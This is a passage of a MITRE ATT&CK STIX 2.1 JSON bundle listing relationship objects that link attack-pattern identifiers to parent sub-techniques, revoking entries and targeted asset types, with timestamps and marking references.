"2023-09-28T19:46:49.255Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T19:46:49.255Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--5e0f75da-e108-4688-a6de-a4f07cc2cbe3", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--5e6cf759-1690-41b3-9e41-d8317f4ef83d", "created": "2020-01-14T01:26:08.261Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--f4599aa0-4f85-4a32-80ea-fc39dc965945", "target_ref": "attack-pattern--43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--5e7f7b93-bf98-4528-b6bc-dc60e47af788", "created": "2020-02-10T19:55:29.505Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--77eae145-55db-4519-8ae5-77b0c7215d69", "target_ref": "attack-pattern--42e8de7b-37b2-4258-905a-6897815e58e0", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--5eac9edf-ec42-4ad9-846e-e36b533fd257", "created": "2020-02-11T18:58:11.872Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--09a60ea3-a8d1-4ae5-976e-5783248b72a4", "target_ref": "attack-pattern--bb5a00de-e086-4859-a231-fa793f6797e2", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--5ee01089-2ab6-4cf5-a39d-adf72666eceb", "created": "2023-09-28T20:16:28.582Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T20:16:28.582Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--e6c31185-8040-4267-83d3-b217b8a92f07", "target_ref": "x-mitre-asset--75f810ad-b678-4c57-b93b-fdc79bba0c04", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--5f2a8f58-9e7a-46a1-95df-c3e85e27a072", "created": "2020-01-17T19:23:15.423Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--573ad264-1371-4ae0-8482-d2673b719dba", "target_ref": "attack-pattern--106c0cf6-bf73-4601-9aa8-0945c2715ec5", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--5f69f13e-c7e7-488f-8e5e-988ab41a2a39", "created": "2022-07-08T21:04:03.858Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-07-08T21:04:03.858Z", "description": "", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--438c967d-3996-4870-bfc2-3954752a1927", "target_ref": "attack-pattern--799ace7f-e227-4411-baa0-8868704f2a69", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--5fa90ef5-e767-439b-9d1a-885438d57a30", "created": "2020-12-28T21:59:02.265Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--24769ab5-14bd-4f4e-a752-cfb185da53ee", "target_ref": "attack-pattern--ebb42bbe-62d7-47d7-a55f-3b08b61d792d", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--5fa955eb-63da-4281-8904-03f6c04c9d8d", "created": "2020-03-17T16:21:36.718Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "revoked-by", "source_ref": "attack-pattern--478aa214-2ca7-4ec0-9978-18798e514790", "target_ref": "attack-pattern--2959d63f-73fd-46a1-abd2-109d7dcede32", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--5fe30af6-e590-4285-9766-af390cdfba0f", "created": "2020-10-02T17:00:44.709Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--ec4be82f-940c-4dcb-87fe-2bbdd17c692f", "target_ref": "attack-pattern--55fc4df0-b42c-479a-b860-7a6761bcaad0", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--5ff26c96-c610-4669-b44e-d6318205be5a", "created": "2023-09-29T16:43:28.841Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T16:43:28.841Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--efbf7888-f61b-4572-9c80-7e2965c60707", "target_ref": "x-mitre-asset--69d1b1ef-e918-4cfd-9a98-29debd04cb32", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--600f0115-94e3-49bf-afa6-0180b3367b94", "created": "2023-09-28T20:06:15.180Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T20:06:15.180Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--8bb4538f-f16f-49f0-a431-70b5444c7349", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--604e1830-11ac-4ccf-a1d0-b22b80c1b024", "created": "2023-09-29T18:07:18.253Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T18:07:18.253Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--2736b752-4ec5-4421-a230-8977dea7649c", "target_ref": "x-mitre-asset--3a95f7e4-4877-4967-b2e8-e287976c3e64", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--605f3853-b007-4134-8a2d-6a81a35e7676", "created": "2023-09-29T18:48:05.559Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T18:48:05.559Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--063b5b92-5361-481a-9c3f-95492ed9a2d8", "target_ref": "x-mitre-asset--f1315d02-9118-4e3b-8cdf-4c2d3f77ce41", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--6067c069-8e93-4bf0-bb49-97538d55c3de", "created": "2024-04-09T20:58:32.884Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2024-04-09T20:58:32.884Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--fab8fc7d-f27f-4fbb-9de6-44740aade05f", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--60d24337-4634-4eef-9d7e-033949228869", "created": "2020-02-18T16:39:06.481Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--86850eff-2729-40c3-b85e-c4af26da4a2d", "target_ref": "attack-pattern--dcaa092b-7de9-4a21-977f-7fcb77e89c48", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--616202de-7fcd-4ca5-bd40-b15db88ce9d1", "created": "2024-05-22T17:20:09.802Z", "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-05-28T02:19:06.006Z", "description": "Asset Mapping Rationale: Adversaries disable a network device\u2019s dedicated hardware encryption, which may enable them to leverage weaknesses in software encryption in order to reduce the effort involved in collecting, manipulating, and exfiltrating transmitted data.", "relationship_type": "targets", "source_ref": "attack-pattern--7efba77e-3bc4-4ca5-8292-d8201dcd64b5", "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--618cfee6-a12a-4e17-b66b-cbd965a08357", "created": "2020-03-19T15:12:13.292Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "revoked-by", "source_ref": "attack-pattern--39a130e1-6ab7-434a-8bd2-418e7d9d6427", "target_ref": "attack-pattern--17cc750b-e95b-4d7d-9dde-49e0de24148c", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--61ea0450-24ef-4077-b5f4-2946e4eaa9b9", "created": "2021-06-07T13:20:23.810Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--0cf55441-b176-4332-89e7-2c4c7799d0ff", "target_ref": "attack-pattern--22905430-4901-4c2a-84f6-98243cb173f8", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--62248cd9-d997-468e-8606-6fa0c36330f4", "created": "2020-03-19T15:09:47.213Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "revoked-by", "source_ref": "attack-pattern--aa8bfbc9-78dc-41a4-a03b-7453e0fdccda", "target_ref": "attack-pattern--fc742192-19e3-466c-9eb5-964a97b29490", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--624c4ae2-f367-4be2-a584-0fb5ec94c694", "created": "2020-07-01T18:23:25.252Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--8868cb5b-d575-4a60-acb2-07d37389a2fd", "target_ref": "attack-pattern--451a9977-d255-43c9-b431-66de80130c8c", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--62959831-1f76-4274-b462-731fcffd164d", "created": "2020-02-18T16:51:57.989Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "revoked-by", "source_ref": "attack-pattern--56ff457d-5e39-492b-974c-dfd2b8603ffe", "target_ref": "attack-pattern--60b508a1-6a5e-46b1-821a-9f7b78752abf", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--62abe387-10a2-414b-881c-060b70db2157", "created": "2023-09-28T20:08:39.992Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T20:08:39.992Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--2d0d40ad-22fa-4cc8-b264-072557e1364b", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--63097f33-1259-4120-8fb0-3a1cf1b6d4ec", "created": "2020-02-12T16:34:07.077Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "revoked-by", "source_ref": "attack-pattern--91ce1ede-107f-4d8b-bf4c-735e8789c94b", "target_ref": "attack-pattern--a2029942-0a85-4947-b23c-ca434698171d", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--630eb861-eb37-4258-9dbd-87789df2257a", "created": "2024-03-26T15:41:26.772Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2024-03-26T15:41:26.772Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--77d9c726-b53e-481d-8bcc-1068aebfbb9d", "target_ref": "x-mitre-asset--973bc51e-c41e-4cec-ac03-9389c71f3d0d", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--632e44a7-833f-4c91-bdae-9a3c4df7db6b", "created": "2020-01-24T18:38:56.163Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--f0589bc3-a6ae-425a-a3d5-5659bfee07f4", "target_ref": "attack-pattern--1ecb2399-e8ba-4f6b-8ba7-5c27d49405cf", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--636ec213-31ce-4e0a-863c-8add1cae68c3", "created": "2020-02-19T18:54:47.777Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--7d77a07d-02fe-4e88-8bd9-e9c008c01bf0", "target_ref": "attack-pattern--1608f3e1-598a-42f4-a01a-2e252e81728f", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--639148fb-d0a5-4a2f-b6a3-a5ceb83d620b", "created": "2023-09-29T17:44:55.599Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T17:44:55.599Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--cd2c76a4-5e23-4ca5-9c40-d5e0604f7101", "target_ref": "x-mitre-asset--68388d4f-8138-420b-be2b-5a7dfe9ff6b4", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--639eca67-c21e-49d6-ac62-cf5a26ac6f15", "created": "2020-02-21T20:46:36.944Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--4eb28bed-d11a-4641-9863-c2ac017d910a", "target_ref": "attack-pattern--3d333250-30e4-4a82-9edc-756c68afc529", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--63f863e5-7c00-4474-8e43-bbe8bfb05cc3", "created": "2023-09-29T16:43:05.495Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T16:43:05.495Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--09a61657-46e1-439e-b3ed-3e4556a78243", "target_ref": "x-mitre-asset--69d1b1ef-e918-4cfd-9a98-29debd04cb32", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--644b9639-cb87-4d14-a3af-3a6e8688417b", "created": "2020-02-21T21:15:06.645Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--2aed01ad-3df3-4410-a8cb-11ea4ded587c", "target_ref": "attack-pattern--15dbf668-795c-41e6-8219-f0447c0e64ce", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--652c1e77-cfea-4452-9762-5ba16f874119", "created": "2023-09-29T17:58:42.002Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T17:58:42.002Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--d67adac8-e3b9-44f9-9e6d-6c2a7d69dbe4", "target_ref": "x-mitre-asset--3a95f7e4-4877-4967-b2e8-e287976c3e64", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--65aa5a0d-926c-4b04-9509-f66a99639877", "created": "2023-09-29T17:41:34.892Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T17:41:34.892Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--b52870cc-83f3-473c-b895-72d91751030b", "target_ref": "x-mitre-asset--68388d4f-8138-420b-be2b-5a7dfe9ff6b4", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--65cf270c-174f-4733-a755-35e2171a529c", "created": "2020-01-14T01:28:32.277Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--41d9846c-f6af-4302-a654-24bba2729bc6", "target_ref": "attack-pattern--43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--65d42e15-749b-4f86-86c5-b9f1da1e60c5", "created": "2023-09-28T21:25:34.304Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T21:25:34.304Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--2d0d40ad-22fa-4cc8-b264-072557e1364b", "target_ref": "x-mitre-asset--e2c3336a-dd93-44d6-8246-f93cf132c499", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--65e25631-05de-4ce2-88cc-52f91cfbdaf2", "created": "2023-10-02T20:18:54.267Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-10-02T20:18:54.267Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--d67adac8-e3b9-44f9-9e6d-6c2a7d69dbe4", "target_ref": "x-mitre-asset--2b676abd-8263-49ea-81a4-78a7e1f776fe", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--66506cb1-20d5-4cb2-b301-e4a5d2868567", "created": "2020-02-11T19:08:51.782Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--650c784b-7504-4df7-ab2c-4ea882384d1e", "target_ref": "attack-pattern--035bb001-ab69-4a0b-9f6c-2de8b09e1b9d", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--66738beb-0a33-4d70-baec-8307b5b34f80", "created": "2023-09-28T20:16:05.975Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T20:16:05.975Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--1c478716-71d9-46a4-9a53-fa5d576adb60", "target_ref": "x-mitre-asset--75f810ad-b678-4c57-b93b-fdc79bba0c04", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--66932869-44bf-4422-b38c-69c9503d5db4", "created": "2020-01-14T17:23:25.291Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "revoked-by", "source_ref": "attack-pattern--c1a452f3-6499-4c12-b7e9-a6a0a102af76", "target_ref": "attack-pattern--7007935a-a8a7-4c0b-bd98-4e85be8ed197", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": 